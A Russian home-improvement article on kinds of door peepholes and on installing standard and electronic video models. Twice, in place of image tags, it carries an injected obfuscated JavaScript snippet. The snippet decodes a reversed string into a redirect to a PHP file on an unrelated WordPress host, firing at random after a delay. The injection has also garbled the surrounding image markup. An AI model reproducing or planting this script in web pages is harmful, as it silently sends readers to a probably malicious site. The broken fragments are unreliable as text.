Дверной глазок — виды конструкций и технология установки
Установив глазок на дверь, вы сможете контролировать ситуацию около входа в дом или квартиру
Думаете, что установить дверной глазок сложно? Накопленный опыт позволяет мне утверждать, что эта работа по силам даже неопытному мастеру. Я расскажу, как выбрать качественное оборудование и дам инструкцию с иллюстрациями, которая позволит справиться с работой даже тем, кто ни разу не ставил глазок в дверь.
$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toryy-priobretaet-vs-600×400.jpg» alt=»Видео глазок — новый вариант, который приобретает все большую популярность» width=»600″ height=»400″ /> Видео глазок — новый вариант, который приобретает все большую популярность
Рекомендации по выбору изделия
Главный элемент обычных глазков — широкоугольная линза «рыбий глаз», которая обеспечивает качественный обзор пространства. У электронных вариантов используется камера.
Для начала разберем, какие типы глазков бывают:
Иллюстрация
Описание
Стандартный глазок двери. Этот вариант отличается простотой и состоит из двух частей — наружной и внутренней, которые скручиваются между собой. В конструкции может присутствовать крышечка, чтобы закрывать отверстие от проникновения света.
Панорамный дверной глазок. Его отличительная особенность — объектив, поделенный на две линзы. Такая конструкция позволяет пропускать больший световой поток.
Чтобы видеть изображение, необязательно стоять вплотную, можно располагаться сбоку от конструкции.
Система для двойной двери. Это может быть как стандартный, так и панорамный вариант. Конструкция состоит из двух частей, при установке следует соблюдать особую точность, чтобы элементы совпадали.
Пуленепробиваемый вариант. Используется на пуленепробиваемых дверных полотнах, чтобы обеспечить надежность конструкции. По методике монтажа ничем не отличается от обычного варианта.
Глазок-перископ. Этот вариант идеален для тех, у кого есть маленькие дети. Смотреть можно как в обычном положении, так и внизу, что очень удобно, если нужно исключить вариант открывания двери незнакомым людям.
Система достаточно сложна в монтаже, поэтому чаще всего работу выполняют специалисты.
Видеоглазок электронного типа. Раньше варианты с видео требовали настройки сигнала для передачи его на монитор или телевизор. Современные технологии позволили сделать компактный и простой вариант, который без труда установит любой человек.
Если вы определились с типом, стоит разобраться с несколькими критериями, которые учитываются при выборе:
Угол обзора. Чем он больше, тем лучше видно пространство перед входом. У дешевых вариантов угол равен 120 градусам, у более совершенных — 180 градусов. Самые качественные модификации имеют обзор свыше 200 градусов, это позволяет устранить искажения по границам изображения;
Угол обзора зависит от формы и расположения линзы
Толщина дверного полотна. Тут может быть три варианта изделий:
до 60 мм;
до 100 мм;
свыше 100 мм.
Любой вариант глазка регулируется на 20-30 мм за счет резьбы. В некоторых моделях поставляются разные втулки, чтобы вы смогли подобрать оптимальное решение под свою дверь;
$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-600×391.jpg» alt=»Резьбовое соединение позволяет подстроиться под толщину дверного полотна» width=»600″ height=»391″ /> Резьбовое соединение позволяет подстроиться под толщину дверного полотна
Диаметр глазка. Этот показатель определяет, какого размера отверстие нужно сверлить. Если в новых конструкциях вы можете выбрать любой вариант, то при замене старых элементов проще всего выбирать изделия того же размера. Чаще всего диаметр внутренней части равен 20 мм;
Материал изготовления. Оптика может быть пластиковой или стеклянной, цена первого варианта намного ниже, зато второй намного прочнее и долговечнее. Корпус может изготавливаться из пластика или металла, второй вариант предпочтительнее, хоть и стоит дороже.
Рекомендации по монтажу
Я расскажу про два варианта проведения работ: установку обычного глазка и варианта с видеонаблюдением.
Монтаж стандартного глазка
Мы разберемся, как производится установка глазка в металлическую дверь.
Иллюстрация
Описание этапа
Производятся замеры. Нас в первую очередь интересует толщина полотна, остальные размеры не так важны.
Зная толщину, вы сможете выбрать подходящий дверной глазок, а не приобретать его наугад.
Подготавливается инструмент. Для выполнения работ своими руками нужно следующее:
Шуруповерт со сверлом по металлу диаметром 5 мм;
Перьевое сверло диаметром 20 мм;
Корончатое сверло по металлу диаметром 20 мм;
Рулетка строительная.
Если диаметр вашего глазка больше, то перьевое и корончатое сверло подбирается в соответствии с параметрами изделия.
Отмечается центр дверного полотна. Глазок обычно располагается посередине, поэтому с помощью рулетки и карандаша отметьте середину.
Отмечается высота расположения глазка. Стандартный вариант — это 150 см от уровня пола, но вы можете поднять или опустить глазок так, чтобы его использование было максимально комфортным.
Производится сверление. В первую очередь в металлической двери надо просверлить сквозное отверстие диаметром 5 мм.
Очень важно использовать сверло достаточной длины, чтобы оно вышло с обратной стороны двери.
При сверлении особое внимание уделите горизонтальному положению шуруповерта. Если отверстие получится перекошенным, то и глазок станет криво.
Сверлится отверстие с наружной стороны. В шуруповерт или электродрель вставляется коронка по металлу, с помощью которой отверстие расширяется до требуемого нам диаметра. Важно работать аккуратно, чтобы не повредить дверное полотно и не погнуть его.
Сверлится облицовка с внутренней стороны. Для работы используется перьевое сверло, главное — ровно держать шуруповерт, чтобы не уйти в сторону.
Отверстие очищается от мусора и проверяется. Просто посмотрите через него, если нет перекосов, значит, все сделано как нужно.
Закрепляется глазок. Для этого его следует придерживать с внешней стороны и вкручивать с внутренней. Если в комплекте есть ключик, то можно дополнительно зажать узел изнутри.
Проверяется работа системы. Закройте дверь и посмотрите в глазок. На этом монтаж завершен.
Установка электронного глазка
Рассмотрим, как производится установка камеры:
Иллюстрация
Описание этапа
Так выглядит комплект камеры. В него входят:
Монитор с кнопками управления;
Аккумуляторная батарея;
Карта памяти;
Камера;
Крепежная платформа.
Для работы нужна только отвертка.
Вставляется аккумулятор. Если у вас система работает от батареек, то ставятся элементы питания.
Ставится карта памяти. Под нее предусмотрен специальный слот, вы ничего не перепутаете в любом случае.
Снимается защитная пленка между контактами питания. Обычно снаружи есть язычок, за который нужно потянуть и тем самым снять защиту с контактов.
С камеры скручивается втулка. Она будет держать элемент изнутри, поэтому ее стоит заранее снять.
Втулка вставляется в крепежную платформу камеры. На этом подготовительные работы завершены.
Платформа с втулкой ставится на дверное полотно. Для наглядности работа показывается на прозрачном модуле, имитирующем двери толщиной 70 мм.
Естественно, перед тем как поменять систему, нужно снять старый глазок. Если же у вас новая дверь, то все особенности сверления отверстий описаны выше, технология подходит и для этого случая.
С внешней стороны вставляется камера. Она аккуратно заводится в отверстие, шлейф протягивается во втулку. После этого производится закручивание втулки до самого упора. На крепежной пластине и камере может быть двухсторонний скотч для приклеивания к дверному полотну, перед монтажом элементов снимите с него защитный слой.
В разъем подключается шлейф камеры. На фото видно, как выглядит соединение в нашем случае, но его конфигурация может отличаться у разных моделей оборудования.
Устанавливается камера. Она аккуратно совмещается с разъемом, после чего защелкивается на пластине.
Камера фиксируется шурупами. Для надежности корпус фиксируется на пластине двумя шурупами.
Камера включается. Все особенности настройки работы системы подскажет инструкция. Вы можете использовать камеру по мере необходимости, а можете настроить датчик движения, и камера всегда будет включаться, когда перед дверью будет кто-то проходить или стоять.
Вывод
Вы узнали, как установить дверной глазок и сможете провести работу без посторонней помощи. Видео в этой статье поможет еще лучше разобраться в теме, а если что-то непонятно — спрашивайте в комментариях.
Понравилась статья? Подписывайтесь на наш канал Яндекс.Дзен
Оставить комментарий
ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней
Оставить комментарий
Оставляя комментарий, Вы принимаете пользовательское соглашение